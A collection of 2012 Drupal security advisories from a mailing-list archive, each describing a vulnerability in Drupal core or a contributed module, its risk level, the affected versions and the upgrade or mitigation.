View online: https://drupal.org/node/1822066 * Advisory ID: DRUPAL-SA-CONTRIB-2012-157 * Project: Time Spent [1] (third-party module) * Version: 6.x, 7.x * Date: 2012-October-24 * Security risk: Critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting, Cross Site Request Forgery, SQL Injection, Multiple vulnerabilities DESCRIPTION - The Time Spent module tracks the time a registered user spends on a site and a site's content. The module doesn't sufficiently sanitize user input. Cross site scripting, cross-site request forgery, and SQL injection vulnerabilities have all been found. CVE: Requested VERSIONS AFFECTED --- * All Time Spent module versions. Drupal core is not affected. If you do not use the contributed Time Spent [3] module, there is nothing you need to do. SOLUTION Uninstall the module: * If you use the Time Spent module you should disable the module. Also see the Time Spent [4] project page. REPORTED BY - * Dylan Riordan [5] (amorsent) * Greg Knaddison [6] (greggles) of the Drupal Security Team COORDINATED BY -- * Forest Monsen [7] (forestmonster) of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [8]. Learn more about the Drupal Security team and their policies [9], writing secure code for Drupal [10], and securing your site [11]. [1] http://drupal.org/project/time_spent [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/time_spent [4] http://drupal.org/project/time_spent [5] http://drupal.org/user/426464 [6] http://drupal.org/user/36762 [7] http://drupal.org/user/181798 [8] http://drupal.org/contact [9] http://drupal.org/security-team [10] http://drupal.org/writing-secure-code [11] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CORE-2012-003 - Drupal core - Arbitrary PHP code execution and Information disclosure
View online: http://drupal.org/node/1815912 * Advisory ID: DRUPAL-SA-CORE-2012-003 * Project: Drupal core [1] * Version: 7.x * Date: 2012-October-17 * Security risk: Highly critical [2] * Exploitable from: Remote * Vulnerability: Information Disclosure, Arbitrary PHP code execution DESCRIPTION - Multiple vulnerabilities were discovered in Drupal core. Arbitrary PHP code execution A bug in the installer code was identified that allows an attacker to re-install Drupal using an external database server under certain transient conditions. This could allow the attacker to execute arbitrary PHP code on the original server. This vulnerability is mitigated by the fact that the re-installation can only be successful if the site's settings.php file or sites directories are writeable by or owned by the webserver user. Configuring the Drupal installation to be owned by a different user than the webserver user (and not to be writeable by the webserver user) is a recommended security best practice [3]. However, in all cases the transient conditions expose information to an attacker who accesses install.php, and therefore this security update should be applied to all Drupal 7 sites. Information disclosure - OpenID module For sites using the core OpenID module, an information disclosure vulnerability was identified that allows an attacker to read files on the local filesystem by attempting to log in to the site using a malicious OpenID server. CVE: Requested VERSIONS AFFECTED --- * Drupal core 7.x versions prior to 7.16. Drupal 6 is not affected. SOLUTION Install the latest version: * If you use Drupal 7.x, upgrade to Drupal core 7.16 [4]. If you are unable to deploy the security release immediately, removing or blocking access to install.php is a sufficient mitigation step for the arbitrary PHP code execution vulnerability. Also see the Drupal core [5] project page. REPORTED BY - * The arbitrary PHP code execution vulnerability was reported by Heine Deelstra [6] and Noam Rathaus [7] working with Beyond Security's SecuriTeam Secure Disclosure Program. Heine Deelstra is also a member of the Drupal Security Team. * The information disclosure vulnerability in the OpenID module was reported by Reginaldo Silva [8]. FIXED BY * The arbitrary PHP code execution vulnerability was fixed by Damien Tournoud [9], David Rothstein [10], Peter Wolanin [11], and Károly Négyesi [12], all members of the Drupal Security Team. * The information disclosure vulnerability in the OpenID module was fixed by Reginaldo Silva [13], Christian Schmidt [14], Vojtěch Kusý [15], and Frédéric Marand [16], and by Peter Wolanin [17], David Rothstein [18], Damien Tournoud [19], and Heine Deelstra [20] of the Drupal Security Team. CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [21]. Learn more about the Drupal Security team and their policies [22], writing secure code for Drupal [23], and securing your site [24]. [1] http://drupal.org/project/drupal [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/node/244924 [4] http://drupal.org/node/1815904 [5] http://drupal.org/project/drupal [6] http://drupal.org/user/17943 [7] http://drupal.org/user/2317662 [8] http://drupal.org/user/2305626 [9] http://drupal.org/user/22211 [10] http://drupal.org/user/124982 [11] http://drupal.org/user/49851 [12] http://drupal.org/user/9446 [13] http://drupal.org/user/2305626 [14] http://drupal.org/user/216078 [15] http://drupal.org/user/56154 [16] http://drupal.org/user/27985 [17] http://drupal.org/user/49851 [18] http://drupal.org/user/124982 [19] http://drupal.org/user/22211 [20] http://drupal.org/user/17943 [21] http://drupal.org/contact [22] http://drupal.org/security-team [23] http://drupal.org/writing-secure-code [24] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-156 - Search API - Cross Site Request Forgery (CSRF)
View online: http://drupal.org/node/1815770 * Advisory ID: DRUPAL-SA-CONTRIB-2012-156 * Project: Search API [1] (third-party module) * Version: 7.x * Date: 2012-October-17 * Security risk: Less critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Request Forgery DESCRIPTION - This module enables you to build searches using a wide range of features, data sources and backends. The module doesn't sufficiently guard the “enable index” action against Cross Site Request Forgery (CSRF) attacks which could allow an attacker to enable existing search indexes on your site. This vulnerability is mitigated by the fact that the attacker would need to guess the machine name or ID of a disabled index or server, and a disabled index would have to be connected to an enabled server for the operation to be successful. The impact from such an enabled index has little effect besides using additional resources for indexing because search pages or views related to the index are not automatically enabled. The enabling of a server has no effect unless existing indexes assigned to that server are subsequently enabled as well. CVE: Requested VERSIONS AFFECTED --- * Search API 7.x-1.x versions prior to 7.x-1.3. Drupal core is not affected. If you do not use the contributed Search API [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Search API module for Drupal 7.x, upgrade to Search API 7.x-1.3 [4] Alternatively, you can remove the vulnerability without upgrading by moving disabled indexes away from servers: * If you have disabled indexes, set them to “< No server >” in the index settings. Also see the Search API [5] project page. REPORTED BY - * Ivo Van Geertruyen (mr.baileys [6]) of the Drupal Security Team FIXED BY * Ivo Van Geertruyen (mr.baileys [7]) of the Drupal Security Team COORDINATED BY -- * Ivo Van Geertruyen (mr.baileys [8]) and Klaus Purer (klausi [9]) of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13]. [1] http://drupal.org/project/search_api [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/search_api [4] http://drupal.org/node/1815124 [5] http://drupal.org/project/search_api [6] http://drupal.org/user/383424 [7] http://drupal.org/user/383424 [8] http://drupal.org/user/383424 [9] http://drupal.org/user/262198 [10] http://drupal.org/contact [11] http://drupal.org/security-team [12] http://drupal.org/writing-secure-code [13] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-155 - ShareThis - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1808856 * Advisory ID: DRUPAL-SA-CONTRIB-2012-155 * Project: ShareThis [1] (third-party module) * Version: 7.x * Date: 2012-October-10 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - This module enables integration with the ShareThis [3] web service to allow social bookmarking amongst your users. The module doesn't sufficiently filter JavaScript settings before outputting them. This vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer sharethis". CVE: Requested VERSIONS AFFECTED --- * ShareThis 7.x-2.x versions prior to 7.x-2.5. Drupal core is not affected. If you do not use the contributed ShareThis [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the ShareThis module for Drupal 7.x, upgrade to ShareThis 7.x-2.5 [5] Also see the ShareThis [6] project page. REPORTED BY - * Jake Bell [7] FIXED BY * Rob Loach [8], the module maintainer COORDINATED BY -- * David Stoline [9] provisional member of the Drupal Security Team * Ben Jeavons [10] of the Drupal Security Team * Greg Knaddison [11] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12]. Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15]. [1] http://drupal.org/project/sharethis [2] http://drupal.org/security-team/risk-levels [3] http://sharethis.com/ [4] http://drupal.org/project/sharethis [5] http://drupal.org/node/1808760 [6] http://drupal.org/project/sharethis [7] http://drupal.org/user/71548 [8] http://drupal.org/user/61114 [9] http://drupal.org/user/329570 [10] http://drupal.org/user/91990 [11] http://drupal.org/user/36762 [12] http://drupal.org/contact [13] http://drupal.org/security-team [14] http://drupal.org/writing-secure-code [15] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-154 - Basic webmail - Multiple vulnerabilities
View online: http://drupal.org/node/1808852 * Advisory ID: DRUPAL-SA-CONTRIB-2012-154 * Project: Basic webmail [1] (third-party module) * Version: 6.x * Date: 2012-October-10 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting, Information Disclosure, Multiple vulnerabilities DESCRIPTION - This module allows site users to read and write e-mail through an IMAP mail server. There are four issues being addressed by this security advisory: * The module doesn't sufficiently sanitize data when setting page title. * The module may store Drupal login IDs and passwords in plain text in the data column of the users table. * The module doesn't sufficiently sanitize data displayed from email messages. * The module allows users who have the 'access basic_webmail' permission to view the e-mail addressof other site users. CVE: Requested VERSIONS AFFECTED --- * Basic webmail 6.x-1.x versions prior to 6.x-1.2. Drupal core is not affected. If you do not use the contributed Basic webmail [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Basic webmail module for Drupal 6.x, upgrade to Basic webmail 6.x-1.2 [4] Also see the Basic webmail [5] project page. REPORTED BY - * Hunter Fox [6] provisional member of the Drupal Security Team FIXED BY * Jason Flatt [7] the module maintainer * Hunter Fox [8] provisional member of the Drupal Security Team COORDINATED BY -- * Hunter Fox [9] provisional member of the Drupal Security Team * Ben Jeavons [10] of the Drupal Security Team * Greg Knaddison [11] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12]. Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15]. [1] http://drupal.org/project/basic_webmail [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/basic_webmail [4] https://drupal.org/node/1808616 [5] http://drupal.org/project/basic_webmail [6] http://drupal.org/user/426416 [7] http://drupal.org/user/4649 [8] http://drupal.org/user/426416 [9] http://drupal.org/user/426416 [10] http://drupal.org/user/91990 [11] http://drupal.org/user/36762 [12] http://drupal.org/contact [13] http://drupal.org/security-team [14] http://drupal.org/writing-secure-code [15] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-153 - Mandrill - Information Disclosure
View online: http://drupal.org/node/1808846 * Advisory ID: DRUPAL-SA-CONTRIB-2012-153 * Project: Mandrill [1] (third-party module) * Version: 7.x * Date: 2012-October-10 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Information Disclosure DESCRIPTION - This module enables you to send emails using an external gateway and by default logs the contents of the messages. An attacker who gains access to the Mandrill dashboard can trigger password reset emails from the Drupal site, get the reset links from the Mandrill logs, and take over an account. CVE: Requested VERSIONS AFFECTED --- * Mandrill 7.x-1.x versions prior to 7.x-1.2. Drupal core is not affected. If you do not use the contributed Mandrill [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Mandrill module for Drupal 7.x, upgrade to Mandrill 7.x-1.2 [4] Also see the Mandrill [5] project page. REPORTED BY - * Patrick Dawkins [6] FIXED BY * Lev Tsypin [7] the module maintainer * Ned McClain [8] provisional member of the Drupal Security Team COORDINATED BY -- * Ned McClain [9] provisional member of the Drupal Security Team * Ben Jeavons [10] of the Drupal Security Team * Greg Knaddison [11] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12]. Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15]. [1] http://drupal.org/project/mandrill [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/mandrill [4] http://drupal.org/node/1807894 [5] http://drupal.org/project/mandrill [6] http://drupal.org/user/1025236 [7] http://drupal.org/user/54135 [8] http://drupal.org/user/798324 [9] http://drupal.org/user/798324 [10] http://drupal.org/user/91990 [11] http://drupal.org/user/36762 [12] http://drupal.org/contact [13] http://drupal.org/security-team [14] http://drupal.org/writing-secure-code [15] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-152 - Feeds - Access bypass
View online: https://drupal.org/node/1808832 * Advisory ID: DRUPAL-SA-CONTRIB-2012-152 * Project: Feeds [1] (third-party module) * Version: 7.x * Date: 2012-October-10 * Security risk: Not critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - The feeds module enables you to import or aggregate data as nodes, users, taxonomy terms or simple database records. The module doesn't sufficiently check permissions when creating nodes on behalf of a user. This vulnerability is mitigated by the fact that an attacker must have control over the source feed, and the Feeds importer must have a field from that feed mapped to the node's author. /Note: the Feeds module doesn't have a stable release and therefore a Security Advisory would not normally be issued, per the Drupal Security Team policy [3]. However, this issue affects the Mailhandler [4] module, which does have a stable release. For modules with dependencies, maintainers are encouraged to create stable releases only for those modules dependent on stable releases./ CVE: Requested VERSIONS AFFECTED --- * Feeds 7.x-2.x versions prior to 7.x-2.0-alpha6. Drupal core is not affected. If you do not use the contributed Feeds [5] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Feeds module for Drupal 7.x, upgrade to Feeds 7.x-2.0-alpha6 [6]. Also see the Feeds [7] project page. REPORTED BY - * Iñaki Lopez [8] FIXED BY * Chris Leppanen [9] the module maintainer * Lee Rowlands [10] provisional member of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/feeds [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/security-advisory-policy [4] http://drupal.org/project/mailhandler [5] http://drupal.org/project/feeds [6] https://drupal.org/node/1808282 [7] http://drupal.org/project/feeds [8] http://drupal.org/user/118449 [9] http://drupal.org/user/473738 [10] http://drupal.org/user/395439 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-151 - Commerce Extra Panes - Cross Site Request Forgery
View online: http://drupal.org/node/1802258 * Advisory ID: DRUPAL-SA-CONTRIB-2012-151 * Project: Commerce extra panes [1] (third-party module) * Version: 7.x * Date: 2012-October-3 * Security risk: Less critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Request Forgery DESCRIPTION - This module, an add-on for Drupal Commerce, allows site builders to place one or more nodes in one of the checkout phases of an order. The module doesn't sufficiently confirm the intent of a site builder when taking certain administrative operations. This could allow an attacker to trick an administrator into unknowingly enabling/disabled a Commerce extra panes pane. CVE: Requested VERSIONS AFFECTED --- * Commerce extra panes 7.x-1.x versions prior to 7.x-1.1. Drupal core is not affected. If you do not use the contributed Commerce extra panes [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Commerce extra panes module for Drupal 7.x, upgrade to Commerce extra panes 7.x-1.1 [4] Also see the Commerce extra panes [5] project page. REPORTED BY - * Ivo Van Geertruyen [6] of the Drupal Security Team FIXED BY * Ivo Van Geertruyen [7] of the Drupal Security Team * Pedro Cambra [8] the Module Maintainer COORDINATED BY -- * Ivo Van Geertruyen [9] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13]. [1] http://drupal.org/project/commerce_extra_panes [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/commerce_extra_panes [4] http://drupal.org/node/1802192 [5] http://drupal.org/project/commerce_extra_panes [6] http://drupal.org/user/383424 [7] http://drupal.org/user/383424 [8] http://drupal.org/user/122101 [9] http://drupal.org/user/383424 [10] http://drupal.org/contact [11] http://drupal.org/security-team [12] http://drupal.org/writing-secure-code [13] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-150 - Twitter Pull - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1802230 * Advisory ID: DRUPAL-SA-CONTRIB-2012-150 * Project: Twitter Pull [1] (third-party module) * Version: 6.x, 7.x * Date: 2012-October-03 * Security risk: Less critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - Twitter Pull allows you to retrieve tweets from Twitter based on a user or search and display them on your site. It also includes integration with the boxes module to allow for simple placement of twitter feeds on various pages. The module doesn't sufficiently filter the data coming from Twitter which could result in script injection and XSS attacks. This vulnerability is mitigated by the fact that Twitter is a generally trusted source and is unlikely to serve malicious content. CVE: Requested VERSIONS AFFECTED --- * Twitter Pull 6.x-1.x versions prior to 6.x-1.3. * Twitter Pull 7.x-1.x versions prior to 7.x-1.0-rc3. Drupal core is not affected. If you do not use the contributed Twitter Pull [3] module, there is nothing you need to do. Drupal core is not affected. If you do not use the contributed Twitter Pull [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Twitter Pull module for Drupal 6.x, upgrade to Twitter Pull 6.x-1.3 [5] * If you use the Twitter Pull module for Drupal 7.x, upgrade to Twitter Pull 7.x-1.0-rc3 [6] Also see the Twitter Pull [7] project page. REPORTED BY - * Sylvain Delbosc [8] * Alex Pott [9] * Tom Phethean [10] FIXED BY * Sylvain Delbosc [11] * Josh Caldwell [12] the module maintainer COORDINATED BY -- * Greg Knaddison [13] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [14]. Learn more about the Drupal Security team and their policies [15], writing secure code for Drupal [16], and securing your site [17]. [1] http://drupal.org/project/twitter_pull [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/twitter_pull [4] http://drupal.org/project/twitter_pull [5] http://drupal.org/node/1801442 [6] http://drupal.org/node/1801444 [7] http://drupal.org/project/twitter_pull [8] http://drupal.org/user/174778 [9] http://drupal.org/user/157725 [10] http://drupal.org/user/881620 [11] http://drupal.org/user/174778 [12] http://drupal.org/user/855980 [13] http://drupal.org/user/27 [14] http://drupal.org/contact [15] http://drupal.org/security-team [16] http://drupal.org/writing-secure-code [17] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-149 - Hostip - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1802218 * Advisory ID: DRUPAL-SA-CONTRIB-2012-149 * Project: Hostip [1] (third-party module) * Version: 6.x, 7.x * Date: 2012-October-03 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - Hostip enables you to query the http://www.hostip.info/ [3] API to get the country / state information based on the user's IP address or a specific IP passed to it. The module fails to sanitize data retrieved from an untrusted third party source, thereby exposing an arbitrary script injection vulnerability (XSS). This vulnerability is mitigated by the fact that an attacker must have either gained access to that third party source or use techniques such as DNS spoofing in order to inject malicious data. CVE: Requested VERSIONS AFFECTED --- * Hostip 6.x-2.x versions prior to 6.x-2.2. * Hostip 7.x-2.x versions prior to 7.x-2.2. Drupal core is not affected. If you do not use the contributed Hostip [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Hostip module for Drupal 6.x, upgrade to Hostip 6.x-1.2 [5] * If you use the Hostip module for Drupal 7.x, upgrade to Hostip 7.x-1.2 [6] Also see the Hostip [7] project page. REPORTED BY - * Klaus Purer [8] of the Drupal Security Team FIXED BY * Vaibhav Jain [9] the module maintainer COORDINATED BY -- * Klaus Purer [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/hostip [2] http://drupal.org/security-team/risk-levels [3] http://www.hostip.info/ [4] http://drupal.org/project/hostip [5] http://drupal.org/node/1802046 [6] http://drupal.org/node/1802048 [7] http://drupal.org/project/hostip [8] http://drupal.org/user/262198 [9] http://drupal.org/user/1159692 [10] http://drupal.org/user/262198 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-148 - OG - Access Bypass
View online: http://drupal.org/node/1796036 * Advisory ID: DRUPAL-SA-CONTRIB-2012-148 * Project: Organic groups [1] (third-party module) * Version: 7.x * Date: 2012-September-26 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - OG (Organic groups) enables users to create and manage their own 'groups'. Each group can have subscribers, and maintains a group home page where subscribers communicate amongst themselves. A group membership can be given immediately upon subscribing, or be pending - waiting for a group administrator to approve it. OG doesn't properly maintain pending memberships if the user is allowed to edit their own account. In addition, under certain circumstances, a user was able to post to a group which they were not a member of. There are no additional mitigating factors for these issues. CVE: Requested VERSIONS AFFECTED --- * OG (Organic groups) 7.x-1.x versions prior to 7.x-1.5. Drupal core is not affected. If you do not use the contributed Organic groups [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the OG 7.x-1.x module for Drupal 7.x, upgrade to OG (Organic groups) 7.x-1.5 [4] Also see the Organic groups [5] project page. REPORTED BY - * Zoltán Tóth [6] * John Takousis [7] FIXED BY * Amitai Burstein [8] the module maintainer COORDINATED BY -- * Lee Rowlands [9] * Greg Knaddison [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/og [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/og [4] http://drupal.org/node/1795906 [5] http://drupal.org/project/og [6] http://drupal.org/user/2126442 [7] http://drupal.org/user/1792608 [8] http://drupal.org/user/57511 [9] http://drupal.org/user/395439 [10] http://drupal.org/user/36762 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-147 - FileField Sources - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1789306 * Advisory ID: DRUPAL-SA-CONTRIB-2012-147 * Project: FileField Sources [1] (third-party module) * Version: 6.x, 7.x * Date: 2012-September-19 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - The Drupal FileField module lets you upload files from your computer through a CCK field. The FileField Sources module expands on this ability by allowing you to select new or existing files through additional means. The FileField Sources module contains a persistent cross site scripting (XSS) vulnerability due to the fact that it fails to sanitize user supplied filenames before display. This vulnerability is mitigated by the fact that malicious users must have the ability to upload files on a field that has the "Reference existing" source enabled. CVE: Requested VERSIONS AFFECTED --- * FileField Sources 6.x-1.x versions prior to 6.x-1.6. * FileField Sources 7.x-1.x versions prior to 7.x-1.6. Drupal core is not affected. If you do not use the contributed FileField Sources [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the FileField Sources module for Drupal 6.x, upgrade to FileField Sources 6.x-1.6 [4] * If you use the FileField Sources module for Drupal 7.x, upgrade to FileField Sources 7.x-1.6 [5] Also see the FileField Sources [6] project page. REPORTED BY - * Disclosed publicly. FIXED BY * Nathan Haug [7] the module maintainer COORDINATED BY -- * Greg Knaddison [8] of the Drupal Security Team * Michael Hess [9] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13]. [1] http://drupal.org/project/filefield_sources [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/filefield_sources [4] http://drupal.org/node/1789300 [5] http://drupal.org/node/1789302 [6] http://drupal.org/project/filefield_sources [7] http://drupal.org/user/35821 [8] http://drupal.org/user/36762 [9] http://drupal.org/user/102818 [10] http://drupal.org/contact [11] http://drupal.org/security-team [12] http://drupal.org/writing-secure-code [13] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-146 - Simplenews Scheduler - Arbitrary code execution
View online: http://drupal.org/node/1789284 * Advisory ID: DRUPAL-SA-CONTRIB-2012-146 * Project: Simplenews Scheduler [1] (third-party module) * Version: 6.x * Date: 2012-September-19 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Arbitrary PHP code execution DESCRIPTION - The Simplenews Scheduler module provides a system for creating automatic email newsletters. These can be set to be sent at a fixed interval, or PHP code can be entered to evaluate a condition for a new newsletter issue to be sent. The module allows a user with the 'send scheduled newsletters' access to the scheduling form where PHP code may be entered. This code is then executed the next time the site runs cron. A site administrator granting permissions is not given sufficient warning that they are granting this level of access to the site. This vulnerability is mitigated by the fact that an attacker must have already been granted a role with the permission 'send scheduled newsletters'. CVE: Requested VERSIONS AFFECTED --- * Simplenews Scheduler 6.x-2.x versions prior to 6.x-2.3. Drupal core is not affected. If you do not use the contributed Simplenews Scheduler [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Simplenews Scheduler module for Drupal 6.x, upgrade to Simplenews Scheduler 6.x-2.4 [4] Also see the Simplenews Scheduler [5] project page. REPORTED BY - * Sascha Grossenbacher [6] * Joachim Noreiko [7] the module maintainer FIXED BY * Joachim Noreiko [8] the module maintainer * Sascha Grossenbacher [9] COORDINATED BY -- * Greg Knaddison [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/simplenews_scheduler [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/simplenews_scheduler [4] http://drupal.org/node/1789274 [5] http://drupal.org/project/simplenews_scheduler [6] http://drupal.org/user/214652 [7] http://drupal.org/user/107701 [8] http://drupal.org/user/107701 [9] http://drupal.org/user/214652 [10] http://drupal.org/user/36762 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-145 - Imagemenu - Cross Site Scripting (XSS)
